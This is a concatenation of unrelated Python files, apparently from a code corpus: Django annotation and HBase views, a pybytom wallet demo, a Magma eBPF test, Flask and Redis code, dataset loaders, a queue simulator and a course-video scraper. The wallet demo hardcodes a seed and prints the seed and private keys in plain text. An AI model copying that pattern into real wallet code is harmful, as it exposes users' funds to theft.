SubCorpus.objects.get(pk=int(subcorpus_id)) if subcorpus_id != 'all' else None document = Document.objects.get(pk=int(document_id)) if document_id != 'all' else None document_title = document.title if document_id != 'all' else 'all' filename = '{}-{}-{}.xlsx'.format(urlquote(corpus.title), urlquote(document_title), language) self.request.session['pos_filename'] = filename export_annotations(pos_file.name, XLSX, corpus, language, subcorpus=subcorpus, document=document, include_non_targets=include_non_targets, add_lemmata=add_lemmata) return JsonResponse(dict(done=True)) class ExportPOSDownload(PermissionRequiredMixin, generic.View): permission_required = 'annotations.change_annotation' def get(self, request, *args, **kwargs): pos_file = self.request.session['pos_file'] pos_filename = self.request.session['pos_filename'] with open(pos_file, 'rb') as f: contents = f.read() os.unlink(pos_file) response = HttpResponse(contents, content_type='application/xlsx') response['Content-Disposition'] = 'attachment; filename={}'.format(pos_filename) return response ############## # Import views ############## class ImportLabelsView(SuperuserRequiredMixin, ImportMixin): """ Allows superusers to import labels to Annotations and Fragments. """ form_class = LabelImportForm template_name = 'annotations/label_form.html' success_message = 'Successfully imported the labels!' def get_success_url(self): return reverse('annotations:import-labels') class AddFragmentsView(SuperuserRequiredMixin, ImportFragmentsMixin): """ Allows superusers to import Fragments. """ form_class = AddFragmentsForm template_name = 'annotations/add_fragments_form.html' success_message = 'Successfully added the fragments!' def get_success_url(self): return reverse('annotations:add-fragments')
nilq/baby-python
python
#!/usr/bin/env python3 from pybytom.wallet import Wallet from pybytom.assets import BTM as ASSET from pybytom.utils import amount_converter import json # Choose network mainnet, solonet or testnet NETWORK: str = "mainnet" # Default is mainnet # Wallet seed SEED: str = "b3337a2fe409afbb257b504e4c09d36b57c32c452b71a0ed413298a5172f727a06bf6605488" \ "723bc545a4bd51f5cd29a3e8bd1433bd1d26e6bf866ff53d1493f" # Message data MESSAGE: str = "a0841d35364046649ab8fc4af5a6266245890778f6cf7304696c4ab8edd86242" # Initialize Bytom wallet wallet: Wallet = Wallet(network=NETWORK) # Get Bytom wallet from seed wallet.from_seed(seed=SEED) # Derivation from path wallet.from_path("m/44/153/1/0/1") # Or derivation from index # wallet.from_index(44) # wallet.from_index(153) # wallet.from_index(1) # wallet.from_index(0) # wallet.from_index(1) # Or derivation from indexes # wallet.from_indexes(["2c000000", "99000000", "01000000", "00000000", "01000000"]) # Print all wallet information's # print(json.dumps(wallet.dumps(), indent=4, ensure_ascii=False)) print("Seed:", wallet.seed()) print("XPrivate Key:", wallet.xprivate_key()) print("Expand XPrivate Key:", wallet.expand_xprivate_key()) print("XPublic Key:", wallet.xpublic_key()) # print("GUID:", wallet.guid()) print("Indexes:", wallet.indexes()) print("Path:", wallet.path()) print("Child XPrivate Key:", wallet.child_xprivate_key()) print("Child XPublic Key:", wallet.child_xpublic_key()) print("Private Key:", wallet.private_key()) print("Public Key:", wallet.public_key()) print("Program:", wallet.program()) print("Address:", wallet.address(vapor=False)) print("Vapor Address:", wallet.address(vapor=True)) print("Balance:", amount_converter(wallet.balance(asset=ASSET, vapor=False), "NEU2BTM"), "BTM") print("Vapor Balance:", amount_converter(wallet.balance(asset=ASSET, vapor=True), "NEU2BTM"), "BTM") print("UTXO's:", wallet.utxos(asset=ASSET, vapor=False)) print("Vapor UTXO's:", wallet.utxos(asset=ASSET, vapor=True)) print("-------- Sign & Verify --------") print("Message:", MESSAGE) signature = wallet.sign(message=MESSAGE) print("Signature:", signature) print("Verified:", wallet.verify(message=MESSAGE, signature=signature))
nilq/baby-python
python
""" Copyright 2020 The Magma Authors. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging import socket import subprocess import threading import time import unittest import warnings from concurrent.futures import Future from lte.protos.mobilityd_pb2 import IPAddress from magma.pipelined.bridge_util import BridgeTools from magma.pipelined.ebpf.ebpf_manager import EbpfManager from scapy.all import AsyncSniffer from scapy.layers.inet import IP, UDP GTP_SCRIPT = "/home/vagrant/magma/lte/gateway/python/magma/pipelined/tests/script/gtp-packet.py" PY_PATH = "/home/vagrant/build/python/bin/python" UL_HANDLER = "/home/vagrant/magma/lte/gateway/python/magma/pipelined/ebpf/ebpf_ul_handler.c" BPF_HEADER_PATH = "/home/vagrant/magma/orc8r/gateway/c/common/ebpf/" # This test works when ran separately. @unittest.skip("AsyncSniffer is not working") class eBpfDatapathULTest(unittest.TestCase): NS_NAME = 'ens1' gtp_veth = "enb0" gtp_veth_ns = "enb1" sgi_veth = "sgi0" sgi_veth1 = "sgi1" sgi_veth_ip = "3.3.3.3" inner_src_ip = '2.2.2.2' inner_dst_ip = '2.2.2.1' gtp_pkt_dst = '11.1.1.1' gtp_pkt_src = '11.1.1.2' packet_cap1 = [] sniffer = None ebpf_man = None @classmethod def setUpClass(cls): pass @classmethod def setUpClassDevices(cls): BridgeTools.delete_ns_all() BridgeTools.create_veth_pair(cls.gtp_veth, cls.gtp_veth_ns) BridgeTools.ifup_netdev(cls.gtp_veth, cls.gtp_pkt_dst + "/24") BridgeTools.create_veth_pair(cls.sgi_veth, cls.sgi_veth1) BridgeTools.create_ns_and_move_veth(cls.NS_NAME, cls.gtp_veth_ns, cls.gtp_pkt_src + "/24") BridgeTools.ifup_netdev(cls.sgi_veth, cls.sgi_veth_ip + "/24") BridgeTools.ifup_netdev(cls.sgi_veth1) gw_ip = IPAddress(version=IPAddress.IPV4, address=socket.inet_aton(cls.sgi_veth_ip)) cls.ebpf_man = EbpfManager(cls.sgi_veth, cls.gtp_veth, gw_ip, UL_HANDLER, bpf_header_path=BPF_HEADER_PATH) cls.ebpf_man.detach_ul_ebpf() cls.ebpf_man.attach_ul_ebpf() cls.sniffer = AsyncSniffer( iface=cls.sgi_veth1, store=False, prn=cls.pkt_cap_fun, ) cls.sniffer.start() @classmethod def sendPacket(cls, gtp_src, gtp_dst, udp_src, udp_dst): try: xmit_cmd = [ "ip", "netns", "exec", cls.NS_NAME, PY_PATH, GTP_SCRIPT, gtp_src, gtp_dst, udp_src, udp_dst, cls.gtp_veth_ns, ] subprocess.check_call(xmit_cmd) logging.debug("del ns %s", xmit_cmd) except subprocess.CalledProcessError as e: logging.debug("Error while xmit from ns: %s", e) @classmethod def tearDownClassDevices(cls): cls.ebpf_man.detach_ul_ebpf() cls.sniffer.stop() BridgeTools.delete_ns_all() BridgeTools.delete_veth(cls.gtp_veth) BridgeTools.delete_veth(cls.sgi_veth) @classmethod def pkt_cap_fun(cls, packet): # print("got packet: %s", packet) cls.packet_cap1.append(packet) @classmethod def count_udp_packet(cls): cnt = 0 for pkt in cls.packet_cap1: # print(pkt.show(dump=True)) if IP in pkt: if pkt[IP].src == cls.inner_src_ip and pkt[IP].dst == cls.inner_dst_ip: cnt = cnt + 1 return cnt def testEbpfUlFrw1(self): cls = self.__class__ cls.setUpClassDevices() cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(len(cls.packet_cap1), 0) cls.ebpf_man.add_ul_entry(100, cls.inner_src_ip) cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 1) cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 2) cls.ebpf_man.del_ul_entry(cls.inner_src_ip) cls.sendPacket(cls.gtp_pkt_src, cls.gtp_pkt_dst, cls.inner_src_ip, cls.inner_dst_ip) self.assertEqual(cls.count_udp_packet(), 2) cls.tearDownClassDevices()
nilq/baby-python
python
# vim:ts=4:sw=4:expandtab '''Simple echo server. ''' from diesel import Application, Service, until_eol, send def hi_server(addr): while 1: inp = until_eol() if inp.strip() == "quit": break send("you said %s" % inp) app = Application() app.add_service(Service(hi_server, 8013)) app.run()
nilq/baby-python
python
from flask import Flask,request,redirect,render_template,url_for,send_from_directory from markupsafe import escape import calculator as hsc application = Flask(__name__) @application.route('/') def index(): return redirect(url_for('calculation')) @application.route('/calculation', methods=["POST", "GET"]) def calculation(): if request.method == "POST": winning_needed = round(float(request.form["total_winning_needed"])) winning_star_bounce = round(float(request.form["winning_star_bounce"])) rate = float(request.form["winning_rate"]) five_to_one = request.form["five_to_one"] == "Yes" imd = hsc.run( total_winning_needed=winning_needed, star_bounce=winning_star_bounce, winning_rate=rate, have_five_to_one=five_to_one ) # file_url = url_for('download_file', filename=str(file_id) + '.png') return render_template('result.html',file_url=imd) else: return render_template('calculation.html') @application.route('/download_file/<filename>') def download_file(filename): return send_from_directory('templates\pic', filename, as_attachment=True) if __name__ == "__main__": application.run()
nilq/baby-python
python
import json import logging from typing import TYPE_CHECKING, Any, Optional, TypeVar from redis.asyncio import Redis, from_url from mognet.exceptions.base_exceptions import NotConnected from mognet.state.base_state_backend import BaseStateBackend from mognet.state.state_backend_config import StateBackendConfig from mognet.tools.urls import censor_credentials if TYPE_CHECKING: from mognet.app.app import App _TValue = TypeVar("_TValue") _log = logging.getLogger(__name__) class RedisStateBackend(BaseStateBackend): def __init__(self, config: StateBackendConfig, app: "App") -> None: super().__init__() self.config = config self.__redis = None self.app = app @property def _redis(self) -> Redis: if self.__redis is None: raise NotConnected return self.__redis async def get( self, request_id: str, key: str, default: _TValue = None ) -> Optional[_TValue]: state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hexists(state_key, key) tr.hget(state_key, key) tr.expire(state_key, self.config.redis.state_ttl) exists, value, *_ = await tr.execute() if not exists: _log.debug( "State of id=%r key=%r did not exist; returning default", request_id, key, ) return default return json.loads(value) async def set(self, request_id: str, key: str, value: Any): state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hset(state_key, key, json.dumps(value).encode()) tr.expire(state_key, self.config.redis.state_ttl) await tr.execute() async def pop( self, request_id: str, key: str, default: _TValue = None ) -> Optional[_TValue]: state_key = self._format_key(request_id) async with self._redis.pipeline(transaction=True) as tr: tr.hexists(state_key, key) tr.hget(state_key, key) tr.hdel(state_key, key) tr.expire(state_key, self.config.redis.state_ttl) exists, value, *_ = await tr.execute() if not exists: _log.debug( "State of id=%r key=%r did not exist; returning default", request_id, key, ) return default return json.loads(value) async def clear(self, request_id: str): state_key = self._format_key(request_id) _log.debug("Clearing state of id=%r", state_key) return await self._redis.delete(state_key) def _format_key(self, result_id: str) -> str: key = f"{self.app.name}.mognet.state.{result_id}" _log.debug("Formatted state key=%r for id=%r", key, result_id) return key async def __aenter__(self): await self.connect() return self async def __aexit__(self, *args, **kwargs): await self.close() async def connect(self): redis: Redis = from_url( self.config.redis.url, max_connections=self.config.redis.max_connections, ) self.__redis = redis async def close(self): redis = self.__redis if redis is not None: self.__redis = None await redis.close() def __repr__(self): return f"RedisStateBackend(url={censor_credentials(self.config.redis.url)!r})"
nilq/baby-python
python
import logging import tempfile import zipfile from collections import OrderedDict from pathlib import Path import numpy as np from PIL import Image from scipy.io import loadmat from . import download from .enums import Split logger = logging.getLogger(__name__) class LeedsSportBase: FOLDER_NAME = None DATA_URL = None def __init__(self, data_dir: Path = Path("/tmp/"), split: Split = Split.TRAIN, transforms=None): """ Loads dataset if it is preseint in `data_dir`. Downloads and loads if not. :param data_dir: The directory in which to put data. """ assert isinstance(split, Split) if not (data_dir / self.FOLDER_NAME).exists(): self._download(data_dir) self.root = data_dir / self.FOLDER_NAME joints = loadmat(self.root / "joints.mat")["joints"] joints = np.moveaxis(joints, -1, 0) self.joints = np.moveaxis(joints, 1, 2) self.image_paths = list( sorted((self.root / "images").glob("*.jpg"), key=lambda p: int(p.stem[2:])) ) self.transforms = transforms def _download(self, data_dir: Path): with tempfile.NamedTemporaryFile() as temp: download.stream(self.DATA_URL, temp) with zipfile.ZipFile(temp) as temp_zipped: temp_zipped.extractall(data_dir / self.FOLDER_NAME) def __getitem__(self, key: int): with self.image_paths[key].open("rb") as f: img = Image.open(f).convert("RGB") # This dataset only has a single person per image, but others may have more # Therefore, wrap keypoints in list. targets = OrderedDict() targets["keypoints"] = [self.joints[key]] if self.transforms: img, targets = self.transforms(img, targets) return img, targets def __len__(self): return self.joints.shape[0] class LeedsSport(LeedsSportBase): FOLDER_NAME = "lsp_dataset_original" DATA_URL = "https://sam.johnson.io/research/lsp_dataset_original.zip" def __init__(self, data_dir: Path = Path("/tmp/"), split: Split = Split.TRAIN): """ Loads dataset if it is preseint in `data_dir`. Downloads and loads if not. :param data_dir: The directory in which to put data. """ super().__init__(data_dir, split) assert split is not Split.VAL, "This dataset does not have a canonical validation split." if split is Split.TRAIN: self.joints = self.joints[:1000] self.image_paths = self.image_paths[:1000] elif split is Split.TEST: self.joints = self.joints[1000:] self.image_paths = self.image_paths[1000:] self.split = split class LeedsSportExtended(LeedsSportBase): FOLDER_NAME = "lsp_dataset_extended" DATA_URL = "https://sam.johnson.io/research/lspet_dataset.zip" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.joints = np.moveaxis(self.joints, 1, 2) if __name__ == "__main__": ds = LeedsSport(split=Split.TEST) print(ds[0][1].shape) ds = LeedsSportExtended() print(ds[0][1].shape)
nilq/baby-python
python
import torch import os from sklearn.neighbors import kneighbors_graph import time import datetime import numpy as np from scipy import sparse class GraphConstructor(object): """ K-NearestNeighbors graph by Euclidean distance. """ def __init__(self, config): self.temperature = config.temperature self.knn = config.knn self.dataset = config.dataset self.method = config.extractor # The choice of extractor assert self.method == 'NT' or self.method == 'AT' or self.method == 'AE' self.extractor_save_dir = config.extractor_save_dir self.graph_size = None # Number of notes self.feature_name = '{}-{}-features.pt'.format(self.dataset.lower(), self.method.lower()) self.feature_path = os.path.join(self.extractor_save_dir, self.feature_name) self.graph_name = '{}-{}-{}nn-graph.npz'.format(self.dataset.lower(), self.method.lower(), self.knn) self.graph_path = os.path.join(self.extractor_save_dir, self.graph_name) self.graph_connectivity_name = '{}-{}-{}nn-graph2.npz'.format(self.dataset.lower(), self.method.lower(), self.knn) self.graph_connectivity_path = os.path.join(self.extractor_save_dir, self.graph_connectivity_name) self.tensor = torch.load(self.feature_path) self.graph = None self.graph_connectivity = None def create_graph(self): if not os.path.exists(self.graph_path): print('Computing k-Neighbors graph...') X = self.tensor.cpu().numpy() start_time = time.time() self.graph = kneighbors_graph(X, self.knn, mode='distance', include_self=True, n_jobs=-1) self.graph_connectivity = kneighbors_graph(X, self.knn, mode='connectivity', include_self=True, n_jobs=-1) et = time.time() - start_time et = str(datetime.timedelta(seconds=et))[:-7] print('Time cost for KNN graph: ', et) sparse.save_npz(self.graph_path, self.graph) sparse.save_npz(self.graph_connectivity_path, self.graph_connectivity) print('Saved KNN graph into {}...'.format(self.graph_path)) print('Using computed k-Neighbors graph: {}'.format(self.graph_path)) self.graph = sparse.load_npz(self.graph_path) self.graph_connectivity = sparse.load_npz(self.graph_connectivity_path) def get_knn_index(self, item): assert isinstance(item, int) or isinstance(item, np.ndarray) if self.graph is None: self.create_graph() knn = self.graph_connectivity[item] indexes = knn.indices if indexes.shape[0] == 31: print('fuck') if isinstance(item, np.ndarray): indexes = indexes.reshape(item.size, -1) indexes = np.fliplr(indexes).copy() # Ensure order return indexes def get_knn_distance(self, item): assert isinstance(item, int) or isinstance(item, np.ndarray) if self.graph is None: self.create_graph() knn = self.graph_connectivity[item] indexes = knn.nonzero() distances = self.graph[item][indexes] distances = np.asarray(distances).squeeze() if isinstance(item, np.ndarray): distances = distances.reshape(item.size, -1) distances = np.fliplr(distances).copy() # Ensure order return distances def get_similarity(self, indices, labels): """Similarity of batch examples""" # Unsupervised similarity matrix notes = self.tensor[indices] batch_size = notes.size(0) a = notes.unsqueeze(1).expand(batch_size, batch_size, -1) b = notes.unsqueeze(0).expand(batch_size, batch_size, -1) euclidean_distance = ((a - b)**2).sum(dim=2) similarity = torch.exp(-euclidean_distance / self.temperature) # Supervised similarity matrix labels = labels.to(notes.device) temp_a = labels.repeat(labels.shape[0], 1) temp_b = labels.unsqueeze(1).repeat(1, labels.shape[0]) mask_intrinsic = (temp_a == temp_b).type(dtype=torch.float32) # Intrinsic mask mask_penalty = (temp_a != temp_b).type(dtype=torch.float32) # Penalty mask matrix_intrinsic = mask_intrinsic * similarity # Intrinsic matrix matrix_penalty = mask_penalty * similarity # Penalty matrix return matrix_intrinsic, matrix_penalty def test(): import argparse parser = argparse.ArgumentParser() config = parser.parse_args() config.temperature = 100 config.knn = 16 config.extractor = 'AE' config.dataset = 'MNIST' config.extractor_save_dir = './results/extractor' config.data_dir = '../data' if not os.path.exists(config.extractor_save_dir): os.makedirs(config.extractor_save_dir) graph = GraphConstructor(config) indexes = graph.get_knn_index(1) print(indexes) from loader import get_loader import numpy as np data_loader = get_loader(config.dataset, config.data_dir, batch_size=128, mode='train', shuffle=False) data_iter = iter(data_loader) idx, (x, y) = next(data_iter) intrinsic, penalty = graph.get_similarity(idx, y) print(intrinsic) print(penalty) if __name__ == '__main__': test()
nilq/baby-python
python
from collections import deque import pandas as pd import numpy as np RT_lambda = int(input("Input inter-arrival time of RT messages: ")) nonRT_lambda = int(input("Input inter-arrival time of non RT messages: ")) RT_service = int(input("Input service time of an RT message: ")) nonRT_service = int(input("Input service time of a nonRT message: ")) max_MC = int(input("Input the maximum Machine clock cycles you want to run the simulation for: ")) class Simulator: def __init__(self, n_RT=0, n_nonRT=0, s=0, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST = -1, \ RT_lambda=10, nonRT_lambda=10, RT_service=4, nonRT_service=4, max_MC= 50): self.n_RT = n_RT #number of items in RT queue self.n_nonRT = n_nonRT #number of items in non RT queue self.s = s #sever status, 0: ideal, 1: servicing RT msg, 2: servicing nonRT msg self.SCL = SCL #service clock self.MC = MC #master clock self.RTCL = RTCL #next RT packet arrival time self.nonRTCL = nonRTCL #next non RT packet arrival time self.preempted_ST = preempted_ST #pre-empted service time self.RT_lambda = RT_lambda #RT msg inter-arrival time self.nonRT_lambda = nonRT_lambda #nonRT msg inter-arrival time self.RT_service = RT_service #RT service time self.nonRT_service = nonRT_service #nonRT service time self.RT_queue = deque([]) #store the arrival time of RT msg self.nonRT_queue = deque([]) self.event_list = [[RTCL, 0], [nonRTCL, 1], [SCL, 2]] self.max_MC = max_MC self.df = pd.DataFrame(columns = ['MC', 'RTCL', 'nonRTCL', 'n_RT', 'n_nonRT', 'SCL', 's', 'preempted_ST']) def start_simulation(self): while self.MC <= self.max_MC: if any([self.n_RT, self.n_nonRT, self.SCL]): if self.preempted_ST == -1: self.preempted_ST = "" current_data = self.simulator_data() self.df = self.df.append(pd.Series(current_data, index=self.df.columns), ignore_index=True) print("MC: {}, RTCL: {}, nonRTCL: {}, nRT: {}, nnonRT: {}, SCL: {}, s: {}, pre-empted: {}".format(*current_data)) if self.preempted_ST == "": self.preempted_ST = -1 if self.SCL == 0: event = min(self.event_list[:2]) else: event = min(self.event_list) self.MC = event[0] if event[1] == 0: self.RT_arrival() elif event[1] == 1: self.nonRT_arrival() elif event[1] == 2: self.service_completion() def RT_arrival(self): self.RT_queue.append(self.RTCL) self.n_RT += 1 self.RTCL = self.MC + self.RT_lambda self.event_list[0][0] = self.RTCL if self.n_RT == 1 and self.s!=1: self.RT_queue.popleft() if self.s == 2: self.preempted_ST = self.SCL - self.MC if self.preempted_ST > 0: self.n_nonRT += 1 self.nonRT_queue.appendleft(self.preempted_ST + self.MC) elif self.preempted_ST == 0: self.preempted_ST = -1 self.SCL = self.MC + self.RT_service self.event_list[2][0] = self.SCL self.n_RT -= 1 self.s = 1 def nonRT_arrival(self): self.nonRT_queue.append(self.nonRTCL) self.n_nonRT += 1 self.nonRTCL = self.MC + self.nonRT_lambda self.event_list[1][0] = self.nonRTCL if self.n_nonRT == 1: if self.s == 0: self.nonRT_queue.popleft() self.SCL = self.MC + self.nonRT_service self.event_list[2][0] = self.SCL self.s = 2 self.n_nonRT -= 1 def service_completion(self): if len(self.RT_queue) > 0: self.SCL = self.MC + self.RT_service self.s = 1 self.n_RT -= 1 self.RT_queue.popleft() self.event_list[2][0] = self.SCL elif len(self.nonRT_queue) > 0: self.nonRT_queue.popleft() self.n_nonRT -= 1 self.s = 2 if self.preempted_ST > 0: self.SCL = self.MC + self.preempted_ST self.preempted_ST = -1 else: self.SCL = self.MC + self.nonRT_service self.event_list[2][0] = self.SCL else: self.s = 0 self.SCL = 0 self.event_list[2][0] = 0 def simulator_data(self): data = [self.MC, self.RTCL, self.nonRTCL, self.n_RT, self.n_nonRT, self.SCL, self.s, self.preempted_ST] return data def write_to_file(self, file_path): self.df.to_csv(file_path, index=False) simulator1 = Simulator(n_RT=0, n_nonRT=0, s=2, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST=-1, \ RT_lambda=RT_lambda, nonRT_lambda=nonRT_lambda, RT_service=RT_service, nonRT_service=nonRT_service, max_MC=max_MC) file_path1 = 'task2.1_output.csv' simulator1.start_simulation() simulator1.write_to_file(file_path1) data = pd.read_csv(file_path1) print("\n") print("OUTPUT TABLE:") print(data)
nilq/baby-python
python
# coding:utf-8 from gevent import monkey;monkey.patch_all() import config from config import COURSEURL from spider.parser import Parser from spider.downloader import Downloader from filedeal.file_downloader import File_Downloader ''' 这个类是爬虫的主逻辑 ''' class SpiderMan(object): def __init__(self): self.downloader = Downloader() # html下载器 self.parser = Parser() # html解析器 def crawl(self, url, ID): ''' :param url: 需要爬取的url :return: ''' # 下载好的html html_cont = self.downloader.download(url) # 爬取到的视频数据信息 self.res_datas = self.parser.parser(html_cont, ID) def download(self, res_datas): ''' :param res_datas: 视频数据信息列表 :return: ''' id = 0 # 设置线程的id号,只是为了进度条显示的时候进行分类信息 for res_data in res_datas: downloader = File_Downloader(res_data, id) # 视频文件下载线程,给每个文件分配一个线程(有点偷懒了) id += 1 config.PERLIST.append(0) # 百分比列表 downloader.start() def cmdshow_gbk(self): print(u'#####################################################################') print(u"#慕课网视频抓取器") print(u"#到慕课网官网打开想要下载的课程的章节列表页面,查看当前url链接") print(u"#例如http://www.imooc.com/learn/615,则课程编号为615") print(u"#####################################################################") try: ID = input('输入要下载的课程编号:') url = COURSEURL + str(ID) print(u"将要下载的课程链接为:", url) print(u'开始解析视频,请稍后:') self.crawl(url, ID) config.PERSUM = len(self.res_datas) * 100.0 # 总的进度 print(u'共有%d条视频' % len(self.res_datas)) print(u"课程名称:%s" % self.res_datas[0].subject) for res_data in self.res_datas: print(u"----->%s" % res_data.filename) state = input('选择清晰度(1:超清UHD,2:高清HD,3:普清SD):') if int(state) not in [1, 2, 3]: print(u'输入有误') return config.STATE = config.CHOOSE[int(state) - 1] self.download(self.res_datas) except Exception as e: print(u'程序炸了', e) return
nilq/baby-python
python
import mimetypes from collections import OrderedDict import json import requests from django.http import HttpResponse from django.shortcuts import render from .client import RestClient from .forms import * import datetime import time def index(request): return render(request, 'home/index.html') class OptimizationAlgorithms(object): def __init__(self, request): self.algorithms_definitions = [ { 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.SizeBalancingAlgorithm', 'action_id': 'optimize_size', 'config_form': SizeBalancingConfig(request.POST), 'is_repeatable': True, 'is_split_algorithm': False, 'display_graph': True }, { 'action_id': 'optimize_opentsdb_vip_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OpenTSDBVipSplitAlgorithm', 'config_form': OpenTSDBVipSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_opentsdb_generic_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OpenTSDBGenericSplitAlgorithm', 'config_form': OpenTSDBGenericSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_generic_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.GenericSplitAlgorithm', 'config_form': GenericSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_optaplanner', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OptaPlannerBalancingAlgorithm', 'config_form': OptaPlannerBalancingConfig(request.POST), 'is_repeatable': True, 'is_split_algorithm': False, 'display_graph': True }, { 'action_id': 'optimize_restore_dump', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.RestoreDumpAlgorithm', 'config_form': RestoreDumpConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': False, 'display_graph': True } ] def get_by_id(self, id): for definition in self.algorithms_definitions: if definition['action_id'] == id: return definition def hbase_region_servers(request): optimization_algorithms = OptimizationAlgorithms(request) json_tasks = RestClient.get_active_tasks() action_buttons = dict() json_status = dict() action_buttons = OrderedDict([ ("optimize_opentsdb_vip_split", "OpenTSDB VIP Split"), ("optimize_opentsdb_generic_split", "OpenTSDB Generic Split"), ("optimize_generic_split", "Generic Split"), ("optimize_optaplanner", "Opta Planner Balancing"), ("optimize_size", "Size Balancing"), ("optimize_restore_dump", "Restore Dump") ]) if request.method == 'POST' and not request.POST.get("cancel") and not request.POST.get("update_dump"): chosen_algorithm = {} if request.POST.get("optimize_size"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_size") elif request.POST.get("optimize_opentsdb_vip_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_opentsdb_vip_split") elif request.POST.get("optimize_opentsdb_generic_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_opentsdb_generic_split") elif request.POST.get("optimize_generic_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_generic_split") elif request.POST.get("optimize_optaplanner"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_optaplanner") elif request.POST.get("optimize_restore_dump"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_restore_dump") elif request.POST.get("preview"): action_buttons = OrderedDict([ ("cancel", "Cancel"), ("execute", "Execute immediately"), ("execute_delayed", "Execute over SCHEDULER_DELAY settings") ]) action_id = request.POST.get("option") chosen_algorithm = optimization_algorithms.get_by_id(action_id) if chosen_algorithm['is_repeatable']: action_buttons.update({"execute_delayed_repeat": "Execute over SCHEDULER_DELAY settings + Repeat"}) action_buttons.move_to_end("execute_delayed_repeat", last=True) if chosen_algorithm['config_form'].is_valid(): json_config = chosen_algorithm['config_form'].get_json_config() json_result = RestClient.get_regions_smart_balancing_plan(chosen_algorithm['full_name'], json.dumps(json_config)) return render(request, 'home/hbase_region_servers_optimize_preview.html', {'action_buttons': action_buttons, 'json': json.dumps(json_result), 'json_current': json_result['currentRegionBalancing'], 'json_new': json_result['newRegionBalancing'], 'score_gain': json_result['scoreGainPercentage'], 'action_id': action_id, 'display_graph': chosen_algorithm['display_graph'], 'full_name': chosen_algorithm['full_name'], 'is_repeatable': chosen_algorithm['is_repeatable'], 'json_config': json_config}) if chosen_algorithm: json_split = '' if chosen_algorithm['is_split_algorithm']: json_split = RestClient.get_tsdb_presplit() action_buttons = OrderedDict([("cancel", "Cancel")]) return render(request, 'home/hbase_region_servers_optimize_config.html', {'json': json_split, 'action_buttons': action_buttons, 'action_id': chosen_algorithm['action_id'], 'form': chosen_algorithm['config_form']}) if request.POST.get("execute"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute(algorithm['full_name'], json_config) time.sleep(10) elif request.POST.get("execute_delayed"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute_delayed(algorithm['full_name'], json_config) elif request.POST.get("execute_delayed_repeat"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute_delayed_repeat(algorithm['full_name'], json_config) if request.POST.get("update_dump"): RestClient.get_dump_update() json_result = RestClient.get_hbase_region_servers() if request.GET.get('chart_height', None): request.session['chart_height'] = request.GET.get('chart_height', None) elif not request.session.get('chart_height'): request.session['chart_height'] = 70 timestamp_seconds = int(RestClient.get_dump_timestamp())/1000 if timestamp_seconds > 0: value = datetime.datetime.fromtimestamp(timestamp_seconds) latest_update = value.strftime('%Y-%m-%d %H:%M:%S') else: latest_update = '' return render(request, 'home/hbase_region_servers.html', {'json': json_result, 'latest_update': latest_update, 'chart_height': request.session['chart_height'], 'json_tasks': json_tasks, 'json_status': json_status, 'action_buttons': action_buttons}) def hbase_tables(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_tables() return render(request, 'home/hbase_tables.html', {'json': json_result, 'json_tasks': json_tasks}) def hbase_regions(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_regions() return render(request, 'home/hbase_regions.html', {'json': json_result, 'json_tasks': json_tasks}) def hbase_regions_infos(request, encoded_name): json_tasks = RestClient.get_active_tasks() # if this is a POST request we need to process the form data if request.method == 'POST': # Call Split region: RestClient.get_split_region(encoded_name) json_result = RestClient.get_hbase_regions_infos(encoded_name) action_buttons = OrderedDict([ ("split_on_region", "Split this region") ]) action_url1 = encoded_name return render(request, 'home/hbase_regions_infos.html', {'json': json_result, 'encoded_name': encoded_name, 'json_tasks': json_tasks, 'action_buttons': action_buttons, 'action_url': action_url1,}) def hbase_tables_infos(request, table_name): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_tables_infos(table_name) if request.GET.get('chart_height', None): request.session['chart_height'] = request.GET.get('chart_height', None) elif not request.session.get('chart_height'): request.session['chart_height'] = 70 return render(request, 'home/hbase_tables_infos.html', {'json': json_result, 'table_name': table_name, 'chart_height': request.session['chart_height']}) def opentsdb_metric(request): json_tasks = RestClient.get_active_tasks() 